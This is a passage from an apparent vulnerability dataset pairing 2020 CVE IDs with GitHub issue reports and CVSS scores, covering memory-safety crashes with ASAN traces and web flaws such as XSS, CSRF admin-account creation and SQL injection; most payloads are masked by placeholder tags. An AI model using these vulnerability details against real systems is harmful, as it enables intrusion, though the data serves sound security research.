  51730. "CVE_ID": "CVE-2020-19667",
  51731. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1895",
  51732. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1895",
  51733. "Repo_new": "imagemagick/imagemagick",
  51734. "Issue_Created_At": "2020-04-14T10:46:31Z",
  51735. "description": "stack buffer overflow at APITAG in APITAG Prerequisites \u2705 ] I have written a descriptive issue title [ \u2705] I have verified that I am using the latest version of APITAG [ \u2705] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There's a stack buffer overflow at APITAG in APITAG poc URLTAG Steps to Reproduce run_cmd APITAG Here's ASAN log. ERRORTAG System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): zlib Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Additional information: ERRORTAG edit by peanuts , and Is it possible to request a cve id\uff1f APITAG",
  51736. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51737. "severity": "HIGH",
  51738. "baseScore": 7.8,
  51739. "impactScore": 5.9,
  51740. "exploitabilityScore": 1.8
  51741. },
  51742. {
  51743. "CVE_ID": "CVE-2020-19668",
  51744. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/136",
  51745. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/136",
  51746. "Repo_new": "saitoha/libsixel",
  51747. "Issue_Created_At": "2020-04-15T10:14:08Z",
  51748. "description": "Unverified indexs into the array lead to out of bound access in APITAG run_cmd APITAG poc URLTAG the asan log ERRORTAG analyse : I use the gdb to debug the bug. I found in the APITAG ,the APITAG is larger than the structure of g which define as NUMBERTAG so the crash occur\uff01 source code is here: ERRORTAG bug position: ERRORTAG gdb log \uff1a ERRORTAG version: CODETAG complies command APITAG",
  51749. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51750. "severity": "MEDIUM",
  51751. "baseScore": 6.5,
  51752. "impactScore": 3.6,
  51753. "exploitabilityScore": 2.8
  51754. },
  51755. {
  51756. "CVE_ID": "CVE-2020-19669",
  51757. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/4",
  51758. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/4",
  51759. "Repo_new": "weng-xianhu/eyoucms",
  51760. "Issue_Created_At": "2019-06-27T04:58:55Z",
  51761. "description": "There is a CSRF vulnerability that can add an admin account. There is one CSRF vulnerability that can add the administrator account An issue was discovered in Eyoucms NUMBERTAG There is a CSRF vulnerability that can add an admin account via APITAG After the admin logged in, open the csrf exp page. ERRORTAG The poc request message: FILETAG After open the csrf exp page, add the hacker5 admin account. FILETAG",
  51762. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51763. "severity": "HIGH",
  51764. "baseScore": 8.8,
  51765. "impactScore": 5.9,
  51766. "exploitabilityScore": 2.8
  51767. },
  51768. {
  51769. "CVE_ID": "CVE-2020-19676",
  51770. "Issue_Url_old": "https://github.com/alibaba/nacos/issues/2284",
  51771. "Issue_Url_new": "https://github.com/alibaba/nacos/issues/2284",
  51772. "Repo_new": "alibaba/nacos",
  51773. "Issue_Created_At": "2020-01-10T07:17:08Z",
  51774. "description": "Incorrect Access Control. Issue Description There is an Incorrect Access Control in NACOS NUMBERTAG Describe what happened (or what feature you want) Visitors can get service details when not logged in. FILETAG FILETAG Describe what you expected to happen I expect it can be fixed. How to reproduce it (as minimally and precisely as possible NUMBERTAG We can set up an environment locally to get the service details interface. FILETAG NUMBERTAG Then get other nacos service names through the service list interface. FILETAG NUMBERTAG Finally we can get service details when not logged in. FILETAG Tell us your environment NACOS NUMBERTAG Anything else we need to know?",
  51775. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  51776. "severity": "MEDIUM",
  51777. "baseScore": 5.3,
  51778. "impactScore": 1.4,
  51779. "exploitabilityScore": 3.9
  51780. },
  51781. {
  51782. "CVE_ID": "CVE-2020-19676",
  51783. "Issue_Url_old": "https://github.com/alibaba/nacos/issues/1105",
  51784. "Issue_Url_new": "https://github.com/alibaba/nacos/issues/1105",
  51785. "Repo_new": "alibaba/nacos",
  51786. "Issue_Created_At": "2019-04-24T09:55:32Z",
  51787. "description": "Access control of resource in Nacos. APITAG Issue Description Type: feature request Describe what happened (or what feature you want) Access control is numerously required by the community, which is helpful to isolate the resources between different users in production environment. Describe what you expected to happen Different users can be assigned different levels of access privileges for the resources in Nacos, such as service, configuration. How to reproduce it (as minimally and precisely as possible) Tell us your environment Anything else we need to know?",
  51788. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  51789. "severity": "MEDIUM",
  51790. "baseScore": 5.3,
  51791. "impactScore": 1.4,
  51792. "exploitabilityScore": 3.9
  51793. },
  51794. {
  51795. "CVE_ID": "CVE-2020-19703",
  51796. "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/107",
  51797. "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/107",
  51798. "Repo_new": "zyx0814/dzzoffice",
  51799. "Issue_Created_At": "2019-07-04T03:59:12Z",
  51800. "description": "Cross site scripting vulnerability exists in Dzzoffice. Cross site scripting vulnerability exists in Dzzoffice POST FILETAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG APITAG pWKa NUMBERTAG sendmail NUMBERTAG Upgrade Insecure Requests NUMBERTAG APITAG There is a cross site scripting attack on the referer parameter Insert payload NUMBERTAG balert NUMBERTAG f NUMBERTAG f NUMBERTAG in the parameter,As shown below: FILETAG Can be successfully executed",
  51801. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51802. "severity": "MEDIUM",
  51803. "baseScore": 6.1,
  51804. "impactScore": 2.7,
  51805. "exploitabilityScore": 2.8
  51806. },
  51807. {
  51808. "CVE_ID": "CVE-2020-19704",
  51809. "Issue_Url_old": "https://github.com/sail-y/spring-boot-admin/issues/7",
  51810. "Issue_Url_new": "https://github.com/sail-y/spring-boot-admin/issues/7",
  51811. "Repo_new": "sail-y/spring-boot-admin",
  51812. "Issue_Created_At": "2019-07-11T03:44:14Z",
  51813. "description": "There is a stored xss vulnerability via APITAG the controller APITAG exist xss vulnerability FILETAG FILETAG FILETAG",
  51814. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51815. "severity": "MEDIUM",
  51816. "baseScore": 5.4,
  51817. "impactScore": 2.7,
  51818. "exploitabilityScore": 2.3
  51819. },
  51820. {
  51821. "CVE_ID": "CVE-2020-19705",
  51822. "Issue_Url_old": "https://github.com/jorycn/thinkphp-zcms/issues/2",
  51823. "Issue_Url_new": "https://github.com/jorycn/thinkphp-zcms/issues/2",
  51824. "Repo_new": "jorycn/thinkphp-zcms",
  51825. "Issue_Created_At": "2019-07-15T15:36:08Z",
  51826. "description": "There is a sql injection vulnerability via APITAG FILETAG use time based bind injection to prove the vulnerability FILETAG",
  51827. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51828. "severity": "CRITICAL",
  51829. "baseScore": 9.8,
  51830. "impactScore": 5.9,
  51831. "exploitabilityScore": 3.9
  51832. },
  51833. {
  51834. "CVE_ID": "CVE-2020-19709",
  51835. "Issue_Url_old": "https://github.com/liufee/feehicms/issues/2",
  51836. "Issue_Url_new": "https://github.com/liufee/feehicms/issues/2",
  51837. "Repo_new": "liufee/feehicms",
  51838. "Issue_Created_At": "2019-07-31T08:24:11Z",
  51839. "description": "Cross site scripting vulnerability exists in Feehicms. Due to the lax filtering of tag parameters, JS code can be inserted to cause cross site scripting attacks.If the tag parameter is assigned to \" APITAG alert NUMBERTAG APITAG APITAG in get mode can cause cross site script attack. FILETAG The exp code is as follows\uff1a URLTAG APITAG",
  51840. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51841. "severity": "MEDIUM",
  51842. "baseScore": 6.1,
  51843. "impactScore": 2.7,
  51844. "exploitabilityScore": 2.8
  51845. },
  51846. {
  51847. "CVE_ID": "CVE-2020-19716",
  51848. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/980",
  51849. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/980",
  51850. "Repo_new": "exiv2/exiv2",
  51851. "Issue_Created_At": "2019-08-09T08:46:00Z",
  51852. "description": "Buffer overflow caused by exhaustive memory usage . There is a buffer overflow in exi NUMBERTAG in file APITAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG The compile command is: cmake ./ ;make To reproduce the issue, run: ./exi NUMBERTAG input Here is the trace reported by asan NUMBERTAG faff NUMBERTAG ba NUMBERTAG PATHTAG NUMBERTAG faff NUMBERTAG bf5e3 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG faff NUMBERTAG PATHTAG NUMBERTAG faff NUMBERTAG bd NUMBERTAG PATHTAG NUMBERTAG faff NUMBERTAG cb4d ( PATHTAG NUMBERTAG faff NUMBERTAG b NUMBERTAG e in operator new FILETAG The attachment is the poc input. FILETAG",
  51853. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51854. "severity": "MEDIUM",
  51855. "baseScore": 6.5,
  51856. "impactScore": 3.6,
  51857. "exploitabilityScore": 2.8
  51858. },
  51859. {
  51860. "CVE_ID": "CVE-2020-19717",
  51861. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/416",
  51862. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/416",
  51863. "Repo_new": "axiomatic-systems/bento4",
  51864. "Issue_Created_At": "2019-08-09T14:02:54Z",
  51865. "description": "Null pointer dereference caused by unhandled exhaustive memory usage. There is a null pointer dereference caused by unhandled exhaustive memory usage in APITAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS= g m NUMBERTAG fsanitize=address,undefined then run: ./mp NUMBERTAG aac input /dev/null The reason is that the malloc size does not check and easily lead to memory allocation failure. FILETAG FILETAG Here is the trace reported by ASAN NUMBERTAG WARNING: APITAG failed to allocate NUMBERTAG ffe1fff1 bytes APITAG allocator is terminating the process instead of returning NUMBERTAG If you don't like this behavior set allocator_may_return_null NUMBERTAG APITAG CHECK failed: PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG f NUMBERTAG b ( PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG f6e NUMBERTAG in operator new FILETAG",
  51866. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51867. "severity": "MEDIUM",
  51868. "baseScore": 6.5,
  51869. "impactScore": 3.6,
  51870. "exploitabilityScore": 2.8
  51871. },
  51872. {
  51873. "CVE_ID": "CVE-2020-19718",
  51874. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/417",
  51875. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/417",
  51876. "Repo_new": "axiomatic-systems/bento4",
  51877. "Issue_Created_At": "2019-08-09T14:25:13Z",
  51878. "description": "Null pointer dereference bug. There is a null pointer dereference bug running mp NUMBERTAG aac. It is similar to NUMBERTAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS= g m NUMBERTAG fsanitize=address,undefined then run: ./mp NUMBERTAG aac input /dev/null The reason for this problem is due to the mishandled memory allocation: FILETAG Here is the trace reported by ASAN: PATHTAG runtime error: null pointer passed as argument NUMBERTAG which is declared to never be null PATHTAG runtime error: null pointer passed as argument NUMBERTAG which is declared to never be null NUMBERTAG WARNING: APITAG failed to allocate NUMBERTAG fffffff8 bytes APITAG allocator is terminating the process instead of returning NUMBERTAG If you don't like this behavior set allocator_may_return_null NUMBERTAG APITAG CHECK failed: PATHTAG NUMBERTAG f NUMBERTAG aa NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG afa NUMBERTAG in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG f NUMBERTAG b ( PATHTAG NUMBERTAG f NUMBERTAG ade NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a2e NUMBERTAG in operator new FILETAG",
  51879. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51880. "severity": "MEDIUM",
  51881. "baseScore": 6.5,
  51882. "impactScore": 3.6,
  51883. "exploitabilityScore": 2.8
  51884. },
  51885. {
  51886. "CVE_ID": "CVE-2020-19719",
  51887. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/414",
  51888. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/414",
  51889. "Repo_new": "axiomatic-systems/bento4",
  51890. "Issue_Created_At": "2019-08-09T12:45:59Z",
  51891. "description": "Buffer overflow in APITAG There is a buffer overflow in APITAG related to APITAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag ERRORTAG then run: APITAG This is the trace reported by ASAN NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f4b NUMBERTAG b NUMBERTAG at pc NUMBERTAG bc1e3 bp NUMBERTAG ff8c NUMBERTAG b8 sp NUMBERTAG ff8c NUMBERTAG a8 WRITE of size NUMBERTAG at NUMBERTAG f4b NUMBERTAG b NUMBERTAG thread T NUMBERTAG bc1e2 in APITAG const&) PATHTAG NUMBERTAG bc1e2 in APITAG int, unsigned char, unsigned int, APITAG PATHTAG NUMBERTAG bccb5 in APITAG int, APITAG PATHTAG NUMBERTAG e1ccc in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ca3 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG b6bae in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG b6bae in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG be NUMBERTAG in APITAG int, unsigned long long, bool, bool, APITAG APITAG PATHTAG NUMBERTAG dc NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ca3 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG b6bae in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG b6bae in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG b in APITAG int, APITAG APITAG PATHTAG NUMBERTAG da NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG da NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ca3 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG b6bae in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG b6bae in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG APITAG &) PATHTAG NUMBERTAG a NUMBERTAG in APITAG APITAG bool) PATHTAG NUMBERTAG a NUMBERTAG in APITAG bool) PATHTAG NUMBERTAG ce7 in main PATHTAG NUMBERTAG f6a6d NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG df1b ( PATHTAG NUMBERTAG f4b NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG Here is the Poc input: FILETAG",
  51892. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51893. "severity": "MEDIUM",
  51894. "baseScore": 6.5,
  51895. "impactScore": 3.6,
  51896. "exploitabilityScore": 2.8
  51897. },
  51898. {
  51899. "CVE_ID": "CVE-2020-19720",
  51900. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/413",
  51901. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/413",
  51902. "Repo_new": "axiomatic-systems/bento4",
  51903. "Issue_Created_At": "2019-08-09T12:23:30Z",
  51904. "description": "Exhaustive memory usage . There is a buffer overflow inside APITAG of APITAG It is similar to NUMBERTAG and NUMBERTAG mp NUMBERTAG aac input_file /dev/null In file PATHTAG APITAG allocates a new buffer to parse the atom in the stream. The unhandled memory allocation failure causes the read content memcpy to a null pointer. This is the start points. FILETAG In file In file PATHTAG FILETAG APITAG is the macro define of memcpy and the path formed. Asan trace report NUMBERTAG WARNING: APITAG failed to allocate NUMBERTAG ff7efffd bytes APITAG allocator is terminating the process instead of returning NUMBERTAG If you don't like this behavior set allocator_may_return_null NUMBERTAG APITAG CHECK failed: PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG fa NUMBERTAG in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG b ( PATHTAG NUMBERTAG f NUMBERTAG de NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG in operator new FILETAG",
  51905. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51906. "severity": "MEDIUM",
  51907. "baseScore": 6.5,
  51908. "impactScore": 3.6,
  51909. "exploitabilityScore": 2.8
  51910. },
  51911. {
  51912. "CVE_ID": "CVE-2020-19721",
  51913. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/415",
  51914. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/415",
  51915. "Repo_new": "axiomatic-systems/bento4",
  51916. "Issue_Created_At": "2019-08-09T13:50:32Z",
  51917. "description": "Heap buffer overflow in APITAG when running mp NUMBERTAG aac. There is a heap buffer overflow in APITAG when running mp NUMBERTAG aac. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag ' DCMAKE_C_FLAGS= g m NUMBERTAG fsanitize=address,undefined' then run: './mp NUMBERTAG aac input /dev/null NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG b NUMBERTAG at pc NUMBERTAG eb6d5 bp NUMBERTAG ffef NUMBERTAG d8 sp NUMBERTAG ffef NUMBERTAG c8 WRITE of size NUMBERTAG at NUMBERTAG f NUMBERTAG b NUMBERTAG thread T NUMBERTAG eb6d4 in APITAG int) PATHTAG NUMBERTAG d7d9b in APITAG int, unsigned char, unsigned int, APITAG PATHTAG NUMBERTAG dde NUMBERTAG in APITAG int, APITAG PATHTAG NUMBERTAG dd3b4 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ca3 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG b6bae in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG b6bae in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG int, APITAG APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG APITAG &) PATHTAG NUMBERTAG a NUMBERTAG in APITAG APITAG bool) PATHTAG NUMBERTAG a NUMBERTAG in APITAG bool) PATHTAG NUMBERTAG ce7 in main PATHTAG NUMBERTAG f6a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG df1b ( PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
  51918. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51919. "severity": "MEDIUM",
  51920. "baseScore": 6.5,
  51921. "impactScore": 3.6,
  51922. "exploitabilityScore": 2.8
  51923. },
  51924. {
  51925. "CVE_ID": "CVE-2020-19722",
  51926. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/418",
  51927. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/418",
  51928. "Repo_new": "axiomatic-systems/bento4",
  51929. "Issue_Created_At": "2019-08-09T14:41:05Z",
  51930. "description": "buffer overflow in APITAG There is a buffer overflow in APITAG related to APITAG Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial gcc NUMBERTAG To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS= g m NUMBERTAG fsanitize=address,undefined then run: ./mp NUMBERTAG aac input /dev/null The occur location in the function APITAG PATHTAG FILETAG Here is the trace reported by ASAN NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG cf at pc NUMBERTAG d6d NUMBERTAG bp NUMBERTAG ffe NUMBERTAG ac8 sp NUMBERTAG ffe NUMBERTAG ab8 WRITE of size NUMBERTAG at NUMBERTAG f NUMBERTAG cf thread T NUMBERTAG d6d NUMBERTAG in APITAG int, unsigned long long, APITAG PATHTAG NUMBERTAG ccfbb in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG fa1f7 in APITAG APITAG &) PATHTAG NUMBERTAG a NUMBERTAG in APITAG APITAG bool) PATHTAG NUMBERTAG a NUMBERTAG in APITAG bool) PATHTAG NUMBERTAG ce7 in main PATHTAG NUMBERTAG f6a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG df1b ( PATHTAG NUMBERTAG f NUMBERTAG cf is located NUMBERTAG bytes to the left of NUMBERTAG byte region FILETAG",
  51931. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51932. "severity": "MEDIUM",
  51933. "baseScore": 6.5,
  51934. "impactScore": 3.6,
  51935. "exploitabilityScore": 2.8
  51936. },
  51937. {
  51938. "CVE_ID": "CVE-2020-19750",
  51939. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1262",
  51940. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1262",
  51941. "Repo_new": "gpac/gpac",
  51942. "Issue_Created_At": "2019-07-05T09:50:55Z",
  51943. "description": "in box_code_base.c line NUMBERTAG has a heap overflow. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! ] I looked for a similar issue and couldn't find any. [ ] I tried with the latest version of GPAC. Installers available at URLTAG [ ] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG in box_code_base.c [line NUMBERTAG URLTAG has a heap overflow. CODETAG When str is full without NUMBERTAG strdup will make a heap overflow.",
  51944. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  51945. "severity": "HIGH",
  51946. "baseScore": 7.5,
  51947. "impactScore": 3.6,
  51948. "exploitabilityScore": 3.9
  51949. },
  51950. {
  51951. "CVE_ID": "CVE-2020-19751",
  51952. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1272",
  51953. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1272",
  51954. "Repo_new": "gpac/gpac",
  51955. "Issue_Created_At": "2019-07-08T12:35:13Z",
  51956. "description": "in odf_code.c line NUMBERTAG have a heap buffer overflow. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [\u2714 ] I looked for a similar issue and couldn't find any. [\u2714 ] I tried with the latest version of GPAC. Installers available at URLTAG [ \u2714] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG in odf_code.c [line NUMBERTAG URLTAG ) The check for size here may have some problems.It will cause a heap APITAG it will resulting in gf_odf_del_ipmp_tool to free a invalid address. Here is the asan's result: ERRORTAG",
  51957. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  51958. "severity": "CRITICAL",
  51959. "baseScore": 9.1,
  51960. "impactScore": 5.2,
  51961. "exploitabilityScore": 3.9
  51962. },
  51963. {
  51964. "CVE_ID": "CVE-2020-19752",
  51965. "Issue_Url_old": "https://github.com/kohler/gifsicle/issues/140",
  51966. "Issue_Url_new": "https://github.com/kohler/gifsicle/issues/140",
  51967. "Repo_new": "kohler/gifsicle",
  51968. "Issue_Created_At": "2019-07-17T02:54:29Z",
  51969. "description": "NULL Pointer Deference vulnerability in find_color_or_error function. In support.c line NUMBERTAG URLTAG , The gfcm could be a NULL pointer in some cases. Here is the usage: gifsicle t NUMBERTAG FILETAG o FILETAG POC here: APITAG Here is Asan's report: ERRORTAG",
  51970. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  51971. "severity": "HIGH",
  51972. "baseScore": 7.5,
  51973. "impactScore": 3.6,
  51974. "exploitabilityScore": 3.9
  51975. },
  51976. {
  51977. "CVE_ID": "CVE-2020-19770",
  51978. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/180",
  51979. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/180",
  51980. "Repo_new": "wuzhicms/wuzhicms",
  51981. "Issue_Created_At": "2019-07-09T09:39:41Z",
  51982. "description": "A stored XSS vulnerability in WUZHI CMS NUMBERTAG This XSS vulnerability was found in the system bulletin(\u7cfb\u7edf\u516c\u544a) in the background. payload: > APITAG \\ APITAG \\ APITAG First we can write payload with a low privileged user named 'test'.As an attacker, you can change a title to prompt an administrator to click on this page. FILETAG Then log in to the admin account and click the change(\u4fee\u6539) button to pop up the admin's cookie. FILETAG FILETAG The reason for the vulnerability is that php code uses blacklists to filter JS code, resulting in poor filtering.",
  51983. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51984. "severity": "MEDIUM",
  51985. "baseScore": 5.4,
  51986. "impactScore": 2.7,
  51987. "exploitabilityScore": 2.3
  51988. },
  51989. {
  51990. "CVE_ID": "CVE-2020-19778",
  51991. "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/23",
  51992. "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/23",
  51993. "Repo_new": "gongfuxiang/shopxo",
  51994. "Issue_Created_At": "2019-07-10T10:07:10Z",
  51995. "description": "\u7248\u672c\u901a\u6740\u65e0\u6761\u4ef6\u767b\u9646\u4efb\u610f\u7528\u6237. APPLICATION\u3001$params FILETAG \u5229\u7528\u4fee\u6539\u5934\u50cf\u63a5\u53e3 APITAG FILETAG APITAG FILETAG APITAG FILETAG APITAG FILETAG APITAG",
  51996. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51997. "severity": "CRITICAL",
  51998. "baseScore": 9.8,
  51999. "impactScore": 5.9,
  52000. "exploitabilityScore": 3.9
  52001. },
  52002. {
  52003. "CVE_ID": "CVE-2020-19821",
  52004. "Issue_Url_old": "https://github.com/millken/doyocms/issues/3",
  52005. "Issue_Url_new": "https://github.com/millken/doyocms/issues/3",
  52006. "Repo_new": "millken/doyocms",
  52007. "Issue_Created_At": "2019-07-20T04:57:53Z",
  52008. "description": "SQL INJECTION AT ADMIN PAGE. code view: FILETAG payload: FILETAG",
  52009. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  52010. "severity": "HIGH",
  52011. "baseScore": 8.8,
  52012. "impactScore": 5.9,
  52013. "exploitabilityScore": 2.8
  52014. },
  52015. {
  52016. "CVE_ID": "CVE-2020-19860",
  52017. "Issue_Url_old": "https://github.com/NLnetLabs/ldns/issues/50",
  52018. "Issue_Url_new": "https://github.com/nlnetlabs/ldns/issues/50",
  52019. "Repo_new": "nlnetlabs/ldns",
  52020. "Issue_Created_At": "2019-09-24T08:11:14Z",
  52021. "description": "heap Out of bound Read. FILETAG",
  52022. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  52023. "severity": "MEDIUM",
  52024. "baseScore": 6.5,
